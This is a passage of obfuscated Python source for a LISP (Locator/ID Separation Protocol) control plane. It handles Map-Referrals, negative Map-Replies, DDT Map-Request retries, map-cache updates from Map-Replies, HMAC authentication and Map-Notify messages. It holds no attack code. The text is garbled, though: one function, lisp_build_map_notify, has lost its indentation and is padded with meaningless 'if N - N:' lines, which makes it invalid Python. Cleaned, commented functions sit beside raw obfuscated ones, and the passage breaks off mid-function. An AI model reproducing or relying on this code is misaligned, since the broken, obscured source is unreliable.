    oO00O0o0Oo = False

    if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
        eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(I11I,
            o0o0o)
        O0O00O = 15

    if (action == LISP_DDT_ACTION_MS_NOT_REG): O0O00O = 1
    if (action == LISP_DDT_ACTION_MS_ACK): O0O00O = 1440
    if (action == LISP_DDT_ACTION_DELEGATION_HOLE): O0O00O = 15
    if (action == LISP_DDT_ACTION_NOT_AUTH): O0O00O = 0

    iI1i111ii1IiI = False
    O000O0 = 0
    IIi1Ii1i11i = lisp_ddt_cache_lookup(I11I, o0o0o, False)
    if (IIi1Ii1i11i != None):
        O000O0 = len(IIi1Ii1i11i.delegation_set)
        iI1i111ii1IiI = IIi1Ii1i11i.is_ms_peer_entry()
        IIi1Ii1i11i.map_referrals_sent += 1

    if (action == LISP_DDT_ACTION_NOT_AUTH): oO00O0o0Oo = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        oO00O0o0Oo = (iI1i111ii1IiI == False)

    IiOo0oOoooO = lisp_eid_record()
    IiOo0oOoooO.rloc_count = O000O0
    IiOo0oOoooO.authoritative = True
    IiOo0oOoooO.action = action
    IiOo0oOoooO.ddt_incomplete = oO00O0o0Oo
    IiOo0oOoooO.eid = eid_prefix
    IiOo0oOoooO.group = group_prefix
    IiOo0oOoooO.record_ttl = O0O00O

    OO0Oo00OO0oo += IiOo0oOoooO.encode()
    IiOo0oOoooO.print_record(" ", True)

    if (O000O0 != 0):
        for IiI11111I1ii1 in IIi1Ii1i11i.delegation_set:
            oOiI111IIIiIii = lisp_rloc_record()
            oOiI111IIIiIii.rloc = IiI11111I1ii1.delegate_address
            oOiI111IIIiIii.priority = IiI11111I1ii1.priority
            oOiI111IIIiIii.weight = IiI11111I1ii1.weight
            oOiI111IIIiIii.mpriority = 255
            oOiI111IIIiIii.mweight = 0
            oOiI111IIIiIii.reach_bit = True
            OO0Oo00OO0oo += oOiI111IIIiIii.encode()
            oOiI111IIIiIii.print_record(" ")

    if (map_request.nonce != 0): port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, OO0Oo00OO0oo, ecm_source, port)
    return
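
#
# lisp_send_negative_map_reply
#
# Build a negative Map-Reply (no RLOC-records) for the given EID/group and
# send it to 'dest', going through the pubsub path when 'pubsub' is set.
# EIDs that carry a crypto-hash (lisp_get_eid_hash() returns non-None) get
# a send-map-request action instead of native-forward/drop.
#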
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
    xtr_id, pubsub):

    lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}".
        format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
        red(dest.print_address(), False)))

    oOoO0OooO0O = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
        LISP_DROP_ACTION

    if (lisp_get_eid_hash(eid) != None):
        oOoO0OooO0O = LISP_SEND_MAP_REQUEST_ACTION

    OO0Oo00OO0oo = lisp_build_map_reply(eid, group, [], nonce, oOoO0OooO0O,
        ttl, None, None, False, False)

    if (pubsub):
        lisp_process_pubsub(sockets, OO0Oo00OO0oo, eid, dest, port, nonce,
            ttl, xtr_id)
    else:
        lisp_send_map_reply(sockets, OO0Oo00OO0oo, dest, port)
    return
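
#
# lisp_retransmit_ddt_map_request
#
# Retransmit timer handler for a queued DDT Map-Request: charge a
# no-response to the referral-node the request was last sent to, give up
# after LISP_MAX_MAP_NOTIFY_RETRIES tries, otherwise resend and re-arm the
# timer.
#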
def lisp_retransmit_ddt_map_request(mr):
    iIiIII = mr.mr_source.print_address()
    o0OO0OooooO = mr.print_eid_tuple()
    OOO0O0O = mr.nonce

    if (mr.last_request_sent_to):
        oo0oo0o0OoO = mr.last_request_sent_to.print_address()
        iii1Ii = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1], True)
        if (iii1Ii and oo0oo0o0OoO in iii1Ii.referral_set):
            iii1Ii.referral_set[oo0oo0o0OoO].no_responses += 1

    if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}".
            format(green(o0OO0OooooO, False), lisp_hex_string(OOO0O0O)))
        mr.dequeue_map_request()
        return

    mr.retry_count += 1

    I1iiIi111I = green(iIiIII, False)
    iiIi = green(o0OO0OooooO, False)
    lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}".
        format(bold("Map-Request", False), "P" if mr.from_pitr else "",
        red(mr.itr.print_address(), False), I1iiIi111I, iiIi,
        lisp_hex_string(OOO0O0O)))

    lisp_send_ddt_map_request(mr, False)

    mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
        lisp_retransmit_ddt_map_request, [mr])
    mr.retransmit_timer.start()
    return
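
#
# lisp_get_referral_node
#
# Collect the up referral-nodes with the best (numerically lowest)
# priority and pick one by hashing the source and destination EIDs, so
# requests spread deterministically across equal-priority nodes. A minimal
# usage sketch (hypothetical variables):
#
#   node = lisp_get_referral_node(referral, mr.mr_source, mr.eid)
#   if (node != None): forward the Map-Request to node.referral_address
#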
def lisp_get_referral_node(referral, source_eid, dest_eid):

    IiI1 = []
    for ooO00O0oOO in list(referral.referral_set.values()):
        if (ooO00O0oOO.updown == False): continue
        if (len(IiI1) == 0 or IiI1[0].priority == ooO00O0oOO.priority):
            IiI1.append(ooO00O0oOO)
        elif (IiI1[0].priority > ooO00O0oOO.priority):
            IiI1 = []
            IiI1.append(ooO00O0oOO)

    OOo000Oo = len(IiI1)
    if (OOo000Oo == 0): return(None)

    iiIIII11iIii = dest_eid.hash_address(source_eid)
    iiIIII11iIii = iiIIII11iIii % OOo000Oo
    return(IiI1[iiIIII11iIii])
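
#
# lisp_send_ddt_map_request
#
# Send a queued Map-Request to the next referral-node, starting over at
# the DDT root when 'send_to_root' is set. Gives up after 8 sends; answers
# the ITR with a negative Map-Reply when no referral entry or reachable
# referral-node exists.
#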
def lisp_send_ddt_map_request(mr, send_to_root):
    IiI11IIIIIi = mr.lisp_sockets
    OOO0O0O = mr.nonce
    I1IoOO0oOOOOO0 = mr.itr
    Ii1OoOoOoO = mr.mr_source
    iIiI1I1ii1I1 = mr.print_eid_tuple()

    if (mr.send_count == 8):
        lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format(
            green(iIiI1I1ii1I1, False), lisp_hex_string(OOO0O0O)))
        mr.dequeue_map_request()
        return

    if (send_to_root):
        OoooOO0 = lisp_address(LISP_AFI_NONE, "", 0, 0)
        iI111iiI = lisp_address(LISP_AFI_NONE, "", 0, 0)
        mr.tried_root = True
        lprint("Jumping up to root for EID {}".format(green(iIiI1I1ii1I1,
            False)))
    else:
        OoooOO0 = mr.eid
        iI111iiI = mr.group

    oooo0o0o00o = lisp_referral_cache_lookup(OoooOO0, iI111iiI, False)
    if (oooo0o0o00o == None):
        lprint("No referral cache entry found")
        lisp_send_negative_map_reply(IiI11IIIIIi, OoooOO0, iI111iiI,
            OOO0O0O, I1IoOO0oOOOOO0, mr.sport, 15, None, False)
        return

    i1IO0ooo00 = oooo0o0o00o.print_eid_tuple()
    lprint("Found referral cache entry {}, referral-type: {}".format(
        i1IO0ooo00, oooo0o0o00o.print_referral_type()))

    ooO00O0oOO = lisp_get_referral_node(oooo0o0o00o, Ii1OoOoOoO, mr.eid)
    if (ooO00O0oOO == None):
        lprint("No reachable referral-nodes found")
        mr.dequeue_map_request()
        lisp_send_negative_map_reply(IiI11IIIIIi, oooo0o0o00o.eid,
            oooo0o0o00o.group, OOO0O0O, I1IoOO0oOOOOO0, mr.sport, 1, None,
            False)
        return

    lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}".format(
        ooO00O0oOO.referral_address.print_address(),
        oooo0o0o00o.print_referral_type(), green(iIiI1I1ii1I1, False),
        lisp_hex_string(OOO0O0O)))

    Ii1oO0o0ooo = (oooo0o0o00o.referral_type == LISP_DDT_ACTION_MS_REFERRAL
        or oooo0o0o00o.referral_type == LISP_DDT_ACTION_MS_ACK)
    lisp_send_ecm(IiI11IIIIIi, mr.packet, Ii1OoOoOoO, mr.sport, mr.eid,
        ooO00O0oOO.referral_address, to_ms=Ii1oO0o0ooo, ddt=True)

    mr.last_request_sent_to = ooO00O0oOO.referral_address
    mr.last_sent = lisp_get_timestamp()
    mr.send_count += 1
    ooO00O0oOO.map_requests_sent += 1
    return
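
#
# lisp_mr_process_map_request
#
# Map-Resolver handling of a Map-Request received in an ECM: queue the
# request so it can be retransmitted and tracked, then forward it into the
# DDT hierarchy.
#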
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
    sport, mr_source):

    I11I = map_request.target_eid
    o0o0o = map_request.target_group
    o0OO0OooooO = map_request.print_eid_tuple()
    iIiIII = mr_source.print_address()
    OOO0O0O = map_request.nonce

    I1iiIi111I = green(iIiIII, False)
    iiIi = green(o0OO0OooooO, False)
    lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}".
        format("P" if map_request.pitr_bit else "",
        red(ecm_source.print_address(), False), I1iiIi111I, iiIi,
        lisp_hex_string(OOO0O0O)))

    iii1i = lisp_ddt_map_request(lisp_sockets, packet, I11I, o0o0o, OOO0O0O)
    iii1i.packet = packet
    iii1i.itr = ecm_source
    iii1i.mr_source = mr_source
    iii1i.sport = sport
    iii1i.from_pitr = map_request.pitr_bit
    iii1i.queue_map_request()

    lisp_send_ddt_map_request(iii1i, False)
    return
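
#
# lisp_process_map_request
#
# Top-level Map-Request dispatcher. Decodes the packet, then hands it to
# the RLOC-probe, SMR, ETR, Map-Server, Map-Resolver, and DDT code paths
# according to the roles this lisp process is running.
#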
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
    mr_source, mr_port, ddt_request, ttl, timestamp):

    OOooo = packet
    O0Ooo = lisp_map_request()
    packet = O0Ooo.decode(packet, mr_source, mr_port)
    if (packet == None):
        lprint("Could not decode Map-Request packet")
        return

    O0Ooo.print_map_request()

    if (O0Ooo.rloc_probe):
        lisp_process_rloc_probe_request(lisp_sockets, O0Ooo, mr_source,
            mr_port, ttl, timestamp)
        return

    if (O0Ooo.smr_bit):
        lisp_process_smr(O0Ooo)

    if (O0Ooo.smr_invoked_bit):
        lisp_process_smr_invoked_request(O0Ooo)

    if (lisp_i_am_etr):
        lisp_etr_process_map_request(lisp_sockets, O0Ooo, mr_source,
            mr_port, ttl, timestamp)

    if (lisp_i_am_ms):
        packet = OOooo
        I11I, o0o0o, Oo00Oo00O = lisp_ms_process_map_request(lisp_sockets,
            OOooo, O0Ooo, mr_source, mr_port, ecm_source)
        if (ddt_request):
            lisp_ms_send_map_referral(lisp_sockets, O0Ooo, ecm_source,
                ecm_port, Oo00Oo00O, I11I, o0o0o)
        return

    if (lisp_i_am_mr and not ddt_request):
        lisp_mr_process_map_request(lisp_sockets, OOooo, O0Ooo,
            ecm_source, mr_port, mr_source)

    if (lisp_i_am_ddt or ddt_request):
        packet = OOooo
        lisp_ddt_process_map_request(lisp_sockets, O0Ooo, ecm_source,
            ecm_port)
    return
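
#
# lisp_store_mr_stats
#
# Account a negative Map-Reply to the map-resolver it came from, keep a
# running RTT total keyed by the last nonce sent, and periodically reset
# the counters.
#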
def lisp_store_mr_stats(source, nonce):
    iii1i = lisp_get_map_resolver(source, None)
    if (iii1i == None): return

    iii1i.neg_map_replies_received += 1
    iii1i.last_reply = lisp_get_timestamp()

    if ((iii1i.neg_map_replies_received % 100) == 0): iii1i.total_rtt = 0

    if (iii1i.last_nonce == nonce):
        iii1i.total_rtt += (time.time() - iii1i.last_used)
        iii1i.last_nonce = 0

    if ((iii1i.neg_map_replies_received % 10) == 0): iii1i.last_nonce = 0
    return
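
#
# lisp_process_map_reply
#
# Process a received Map-Reply: decode each EID-record and its
# RLOC-records, merge the RLOC-set into the map-cache (respecting gleaned
# entries, NAT-traversal preferences, and JSON/telemetry RLOCs), and
# trigger immediate RLOC-probes for entries seen for the first time.
#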
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
    global lisp_map_cache

    i1II1i11 = lisp_map_reply()
    packet = i1II1i11.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Reply packet")
        return

    i1II1i11.print_map_reply()

    O0oo0OOo00o0o = None
    for OoOOoO0oOo in range(i1II1i11.record_count):
        IiOo0oOoooO = lisp_eid_record()
        packet = IiOo0oOoooO.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Reply packet")
            return
        IiOo0oOoooO.print_record(" ", False)

        if (IiOo0oOoooO.rloc_count == 0):
            lisp_store_mr_stats(source, i1II1i11.nonce)

        oOoiii = (IiOo0oOoooO.group.is_null() == False)

        if (lisp_decent_push_configured):
            oOoO0OooO0O = IiOo0oOoooO.action
            if (oOoiii and oOoO0OooO0O == LISP_DROP_ACTION):
                if (IiOo0oOoooO.eid.is_local()): continue

        if (oOoiii == False and IiOo0oOoooO.eid.is_null()): continue

        if (oOoiii):
            I11 = lisp_map_cache_lookup(IiOo0oOoooO.eid, IiOo0oOoooO.group)
        else:
            I11 = lisp_map_cache.lookup_cache(IiOo0oOoooO.eid, True)

        II1II1I = (I11 == None)

        if (I11 == None):
            iI11Ii, ooooO00o0, o00oOo0O0OO = lisp_allow_gleaning(
                IiOo0oOoooO.eid, IiOo0oOoooO.group, None)
            if (iI11Ii): continue
        else:
            if (I11.gleaned): continue

        IiIiIiiII1I = []
        O0o00O00oo0oO = None
        for I1I1II1iI in range(IiOo0oOoooO.rloc_count):
            oOiI111IIIiIii = lisp_rloc_record()
            oOiI111IIIiIii.keys = i1II1i11.keys
            packet = oOiI111IIIiIii.decode(packet, i1II1i11.nonce)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Reply packet")
                return
            oOiI111IIIiIii.print_record(" ")

            ii1II1i1 = None
            if (I11): ii1II1i1 = I11.get_rloc(oOiI111IIIiIii.rloc)
            if (ii1II1i1):
                OooOOoOO0OO = ii1II1i1
            else:
                OooOOoOO0OO = lisp_rloc()

            O00oo0o0o0oo = OooOOoOO0OO.store_rloc_from_record(
                oOiI111IIIiIii, i1II1i11.nonce, source)
            OooOOoOO0OO.echo_nonce_capable = i1II1i11.echo_nonce_capable

            if (OooOOoOO0OO.echo_nonce_capable):
                Oo0o = OooOOoOO0OO.rloc.print_address_no_iid()
                if (lisp_get_echo_nonce(None, Oo0o) == None):
                    lisp_echo_nonce(Oo0o)

            if (OooOOoOO0OO.json):
                if (lisp_is_json_telemetry(OooOOoOO0OO.json.json_string)):
                    o0II1111III = OooOOoOO0OO.json.json_string
                    o0II1111III = lisp_encode_telemetry(o0II1111III,
                        ii=itr_in_ts)
                    OooOOoOO0OO.json.json_string = o0II1111III

            if (i1II1i11.rloc_probe and oOiI111IIIiIii.probe_bit):
                if (OooOOoOO0OO.rloc.afi == source.afi):
                    lisp_process_rloc_probe_reply(OooOOoOO0OO, source,
                        O00oo0o0o0oo, i1II1i11, ttl, O0o00O00oo0oO)
                if (OooOOoOO0OO.rloc.is_multicast_address()):
                    O0o00O00oo0oO = OooOOoOO0OO

            IiIiIiiII1I.append(OooOOoOO0OO)

            if (lisp_data_plane_security and
                OooOOoOO0OO.rloc_recent_rekey()):
                O0oo0OOo00o0o = OooOOoOO0OO

        if (i1II1i11.rloc_probe == False and lisp_nat_traversal):
            ooO0Oo = []
            iII1Ii1Ii = []
            for OooOOoOO0OO in IiIiIiiII1I:
                if (OooOOoOO0OO.rloc.is_private_address()):
                    OooOOoOO0OO.priority = 1
                    OooOOoOO0OO.state = LISP_RLOC_UNREACH_STATE
                    ooO0Oo.append(OooOOoOO0OO)
                    iII1Ii1Ii.append(
                        OooOOoOO0OO.rloc.print_address_no_iid())
                    continue

                if (OooOOoOO0OO.priority == 254 and lisp_i_am_rtr == False):
                    ooO0Oo.append(OooOOoOO0OO)
                    iII1Ii1Ii.append(
                        OooOOoOO0OO.rloc.print_address_no_iid())

                if (OooOOoOO0OO.priority != 254 and lisp_i_am_rtr):
                    ooO0Oo.append(OooOOoOO0OO)
                    iII1Ii1Ii.append(
                        OooOOoOO0OO.rloc.print_address_no_iid())

            if (iII1Ii1Ii != []):
                IiIiIiiII1I = ooO0Oo
                lprint("NAT-traversal optimized RLOC-set: {}".format(
                    iII1Ii1Ii))

        ooO0Oo = []
        for OooOOoOO0OO in IiIiIiiII1I:
            if (OooOOoOO0OO.json != None): continue
            ooO0Oo.append(OooOOoOO0OO)

        if (ooO0Oo != []):
            IiI = len(IiIiIiiII1I) - len(ooO0Oo)
            lprint("Pruning {} no-address RLOC-records for map-cache".
                format(IiI))
            IiIiIiiII1I = ooO0Oo

        if (i1II1i11.rloc_probe and I11 != None): IiIiIiiII1I = I11.rloc_set

        ooOooo00OoO0 = II1II1I
        if (I11 and IiIiIiiII1I != I11.rloc_set):
            I11.delete_rlocs_from_rloc_probe_list()
            ooOooo00OoO0 = True

        o0OOO = I11.uptime if (I11) else None
        if (I11 == None):
            I11 = lisp_mapping(IiOo0oOoooO.eid, IiOo0oOoooO.group,
                IiIiIiiII1I)
            I11.mapping_source = source

        if (lisp_i_am_rtr and IiOo0oOoooO.group.is_null() == False):
            I11.map_cache_ttl = LISP_MCAST_TTL
        else:
            I11.map_cache_ttl = IiOo0oOoooO.store_ttl()

        I11.action = IiOo0oOoooO.action
        I11.add_cache(ooOooo00OoO0)

        ooiI11iIi1 = "Add"
        if (o0OOO):
            I11.uptime = o0OOO
            I11.refresh_time = lisp_get_timestamp()
            ooiI11iIi1 = "Replace"

        lprint("{} {} map-cache with {} RLOCs".format(ooiI11iIi1,
            green(I11.print_eid_tuple(), False), len(IiIiIiiII1I)))

        if (lisp_ipc_dp_socket and O0oo0OOo00o0o != None):
            lisp_write_ipc_keys(O0oo0OOo00o0o)

        if (II1II1I):
            I1IO0O00o0oo0oO = bold("RLOC-probe", False)
            for OooOOoOO0OO in I11.best_rloc_set:
                Oo0o = red(OooOOoOO0OO.rloc.print_address_no_iid(), False)
                lprint("Trigger {} to {}".format(I1IO0O00o0oo0oO, Oo0o))
                lisp_send_map_request(lisp_sockets, 0, I11.eid, I11.group,
                    OooOOoOO0OO)
    return
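
#
# lisp_compute_auth
#
# Fill in the authentication data of a Map-Register style message: zero
# the auth field, HMAC the packet with the shared password, and encode the
# digest back into the packet.
#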
def lisp_compute_auth(packet, map_register, password):
    if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)

    packet = map_register.zero_auth(packet)
    iiIIII11iIii = lisp_hash_me(packet, map_register.alg_id, password, False)

    map_register.auth_data = iiIIII11iIii
    packet = map_register.encode_auth(packet)
    return(packet)
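
#
# lisp_hash_me
#
# HMAC a packet with SHA-1 or SHA-256, selected by 'alg_id'; returns the
# hex digest when 'do_hex' is set, the raw digest otherwise.
#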
def lisp_hash_me(packet, alg_id, password, do_hex):
    if (alg_id == LISP_NONE_ALG_ID): return(True)

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        oO00o0oooo = hashlib.sha1
    if (alg_id == LISP_SHA_256_128_ALG_ID):
        oO00o0oooo = hashlib.sha256

    if (do_hex):
        iiIIII11iIii = hmac.new(password.encode(), packet,
            oO00o0oooo).hexdigest()
    else:
        iiIIII11iIii = hmac.new(password.encode(), packet,
            oO00o0oooo).digest()
    return(iiIIII11iIii)
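
#
# lisp_verify_auth
#
# Recompute the hash over a received packet and compare it with the
# authentication data the packet carried. A minimal sketch (hypothetical
# values; the packet's auth field must already be zeroed, as the sender
# did in lisp_compute_auth()):
#
#   digest = lisp_hash_me(packet, LISP_SHA_256_128_ALG_ID, password, True)
#   authenticated = (digest == auth_data)
#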
def lisp_verify_auth(packet, alg_id, auth_data, password):
    if (alg_id == LISP_NONE_ALG_ID): return(True)

    iiIIII11iIii = lisp_hash_me(packet, alg_id, password, True)
    iII11I11I = (iiIIII11iIii == auth_data)

    if (iII11I11I == False):
        lprint("Hashed value: {} does not match packet value: {}".format(
            iiIIII11iIii, auth_data))
    return(iII11I11I)
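
#
# lisp_retransmit_map_notify
#
# Retransmit timer handler for a pending Map-Notify: dequeue it after
# LISP_MAX_MAP_NOTIFY_RETRIES attempts, otherwise resend it to the ETR and
# re-arm the timer.
#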
def lisp_retransmit_map_notify(map_notify):
    OooOOooo = map_notify.etr
    O00oo0o0o0oo = map_notify.etr_port

    if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}".
            format(map_notify.nonce_key, red(OooOOooo.print_address(),
            False)))

        III11II111 = map_notify.nonce_key
        if (III11II111 in lisp_map_notify_queue):
            map_notify.retransmit_timer.cancel()
            lprint("Dequeue Map-Notify from retransmit queue, key is: {}".
                format(III11II111))
            try:
                lisp_map_notify_queue.pop(III11II111)
            except:
                lprint("Key not found in Map-Notify queue")
        return

    IiI11IIIIIi = map_notify.lisp_sockets
    map_notify.retry_count += 1

    lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format(
        bold("Map-Notify", False), map_notify.nonce_key,
        red(OooOOooo.print_address(), False), map_notify.retry_count))

    lisp_send_map_notify(IiI11IIIIIi, map_notify.packet, OooOOooo,
        O00oo0o0o0oo)
    if (map_notify.site): map_notify.site.map_notifies_sent += 1

    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
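
#
# lisp_send_merged_map_notify
#
# After merging a multi-ETR registration, build a Map-Notify that carries
# the merged RLOC-set and send an individually authenticated copy to each
# registered RLOC, queueing each copy for retransmission.
#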
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
    eid_record):

    eid_record.rloc_count = len(parent.registered_rlocs)
    O000O0o00oooOO = eid_record.encode()
    eid_record.print_record("Merged Map-Notify ", False)

    for O00OO0O0O0ooo in parent.registered_rlocs:
        oOiI111IIIiIii = lisp_rloc_record()
        oOiI111IIIiIii.store_rloc_entry(O00OO0O0O0ooo)
        oOiI111IIIiIii.local_bit = True
        oOiI111IIIiIii.probe_bit = False
        oOiI111IIIiIii.reach_bit = True
        O000O0o00oooOO += oOiI111IIIiIii.encode()
        oOiI111IIIiIii.print_record(" ")
        del(oOiI111IIIiIii)

    for O00OO0O0O0ooo in parent.registered_rlocs:
        OooOOooo = O00OO0O0O0ooo.rloc
        IIiiIiI = lisp_map_notify(lisp_sockets)
        IIiiIiI.record_count = 1
        oo0OO0oo = map_register.key_id
        IIiiIiI.key_id = oo0OO0oo
        IIiiIiI.alg_id = map_register.alg_id
        IIiiIiI.auth_len = map_register.auth_len
        IIiiIiI.nonce = map_register.nonce
        IIiiIiI.nonce_key = lisp_hex_string(IIiiIiI.nonce)
        IIiiIiI.etr.copy_address(OooOOooo)
        IIiiIiI.etr_port = map_register.sport
        IIiiIiI.site = parent.site
        OO0Oo00OO0oo = IIiiIiI.encode(O000O0o00oooOO,
            parent.site.auth_key[oo0OO0oo])
        IIiiIiI.print_notify()

        III11II111 = IIiiIiI.nonce_key
        if (III11II111 in lisp_map_notify_queue):
            OOO = lisp_map_notify_queue[III11II111]
            OOO.retransmit_timer.cancel()
            del(OOO)
        lisp_map_notify_queue[III11II111] = IIiiIiI

        lprint("Send merged Map-Notify to ETR {}".format(
            red(OooOOooo.print_address(), False)))
        lisp_send(lisp_sockets, OooOOooo, LISP_CTRL_PORT, OO0Oo00OO0oo)

        parent.site.map_notifies_sent += 1

        IIiiIiI.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
            lisp_retransmit_map_notify, [IIiiIiI])
        IIiiIiI.retransmit_timer.start()
    return
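
#
# lisp_build_map_notify
#
# Build and send a Map-Notify, either as an ack to a Map-Register or as an
# RLOC-set change notification; only the latter is queued and
# retransmitted until acked.
#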
def lisp_build_map_notify ( lisp_sockets , eid_records , eid_list , record_count ,
source , port , nonce , key_id , alg_id , auth_len , site , map_register_ack ) :
if 69 - 69: I11i / OoO0O00
III11II111 = lisp_hex_string ( nonce ) + source . print_address ( )
if 73 - 73: i11iIiiIii / i1IIi
if 8 - 8: O0 / OOooOOo + iII111i % iIii1I11I1II1 % iIii1I11I1II1 . ooOoO0o
if 47 - 47: OoO0O00 / o0oOOo0O0Ooo / Ii1I * I1IiiI % ooOoO0o / I1Ii111
if 80 - 80: I1Ii111 / O0 * O0
if 40 - 40: OoO0O00 - oO0o / o0oOOo0O0Ooo . oO0o
if 89 - 89: i11iIiiIii - II111iiii
lisp_remove_eid_from_map_notify_queue ( eid_list )
if ( III11II111 in lisp_map_notify_queue ) :
IIiiIiI = lisp_map_notify_queue [ III11II111 ]
I1iiIi111I = red ( source . print_address_no_iid ( ) , False )
lprint ( "Map-Notify with nonce 0x{} pending for xTR {}" . format ( lisp_hex_string ( IIiiIiI . nonce ) , I1iiIi111I ) )
if 67 - 67: IiII % I1Ii111 + i11iIiiIii
return
if 53 - 53: OOooOOo
if 95 - 95: oO0o - OOooOOo % I1Ii111 / OoooooooOO % OoooooooOO - O0
IIiiIiI = lisp_map_notify ( lisp_sockets )
IIiiIiI . record_count = record_count
key_id = key_id
IIiiIiI . key_id = key_id
IIiiIiI . alg_id = alg_id
IIiiIiI . auth_len = auth_len
IIiiIiI . nonce = nonce
IIiiIiI . nonce_key = lisp_hex_string ( nonce )
IIiiIiI . etr . copy_address ( source )
IIiiIiI . etr_port = port
IIiiIiI . site = site
IIiiIiI . eid_list = eid_list
if 21 - 21: I1Ii111 . i1IIi - iII111i % I1ii11iIi11i . OOooOOo
if 52 - 52: Ii1I * I1ii11iIi11i
if 21 - 21: I1IiiI . i11iIiiIii - o0oOOo0O0Ooo * II111iiii % iIii1I11I1II1
if 9 - 9: I1ii11iIi11i + I11i
if ( map_register_ack == False ) :
III11II111 = IIiiIiI . nonce_key
lisp_map_notify_queue [ III11II111 ] = IIiiIiI
if 20 - 20: iII111i + i1IIi / oO0o % OoooooooOO * OoOoOO00
if 70 - 70: Oo0Ooo - OOooOOo * OOooOOo / o0oOOo0O0Ooo
if ( map_register_ack ) :
lprint ( "Send Map-Notify to ack Map-Register" )
else :
lprint ( "Send Map-Notify for RLOC-set change" )
if 4 - 4: OoOoOO00 / OoO0O00
if 66 - 66: I1Ii111 / OoOoOO00
if 53 - 53: OoOoOO00 . i11iIiiIii - OoooooooOO
if 92 - 92: O0 - i11iIiiIii + OoO0O00 - OoooooooOO - o0oOOo0O0Ooo
if 25 - 25: oO0o / oO0o / Ii1I / O0
OO0Oo00OO0oo = IIiiIiI . encode ( eid_records , site . auth_key [ key_id ] )
IIiiIiI . print_notify ( )
if 56 - 56: ooOoO0o
if ( map_register_ack == False ) :
IiOo0oOoooO = lisp_eid_record ( )
IiOo0oOoooO . decode ( eid_records )
IiOo0oOoooO . print_record ( " " , False )
if 19 - 19: O0 * I1IiiI + I1ii11iIi11i
if 25 - 25: I11i - ooOoO0o / OoO0O00 / iII111i - OoO0O00
if 86 - 86: OoO0O00
if 89 - 89: OoooooooOO % iII111i * I1ii11iIi11i + I1ii11iIi11i . Oo0Ooo
if 4 - 4: I11i
lisp_send_map_notify ( lisp_sockets , OO0Oo00OO0oo , IIiiIiI . etr , port )
site . map_notifies_sent += 1
if 8 - 8: IiII
if ( map_register_ack ) : return
if 1 - 1: ooOoO0o . IiII
if 4 - 4: iIii1I11I1II1 % I1IiiI - OoooooooOO / iII111i
if 55 - 55: O0 + iII111i * OoOoOO00 . i11iIiiIii * Ii1I + oO0o
if 66 - 66: i1IIi . I1ii11iIi11i
if 86 - 86: Oo0Ooo
if 48 - 48: OoO0O00
IIiiIiI . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ IIiiIiI ] )
IIiiIiI . retransmit_timer . start ( )
return
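
# Note (added commentary): the pending-queue key built above is the hex
# nonce concatenated with the printed xTR address, e.g. nonce 0xdeadbeef
# from 10.0.0.1 queues under "deadbeef10.0.0.1" (the exact hex text is
# whatever lisp_hex_string() returns). A retransmitting xTR therefore
# reuses its pending Map-Notify instead of triggering a duplicate build.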

def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
    map_notify.map_notify_ack = True

    #
    # Encode the packet and authenticate it with the map-server password.
    #
    packet = map_notify.encode(eid_records, ms.password)
    map_notify.print_notify()

    #
    # Send the Map-Notify-Ack back to the map-server.
    #
    dest = ms.map_server
    lprint("Send Map-Notify-Ack to {}".format(
        red(dest.print_address(), False)))
    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return

def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):

    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = 1
    map_notify.nonce = lisp_get_control_nonce()
    map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
    map_notify.etr.copy_address(xtr)
    map_notify.etr_port = LISP_CTRL_PORT
    map_notify.eid_list = eid_list
    key = map_notify.nonce_key

    #
    # If a Map-Notify is already queued for this ITR, let the retransmit
    # timer deliver it; don't queue another.
    #
    lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
    if (key in lisp_map_notify_queue):
        map_notify = lisp_map_notify_queue[key]
        lprint("Map-Notify with nonce 0x{} pending for ITR {}".format(
            map_notify.nonce, red(xtr.print_address_no_iid(), False)))
        return

    #
    # Put Map-Notify state on the retransmission queue.
    #
    lisp_map_notify_queue[key] = map_notify

    #
    # If the registered RLOC-set contains RTRs, announce only the RTRs,
    # unless this xTR is itself one of them.
    #
    rtrs_in_set = site_eid.rtrs_in_rloc_set()
    if (rtrs_in_set):
        if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_in_set = False

    #
    # Build the EID-record for the (S,G) entry being announced.
    #
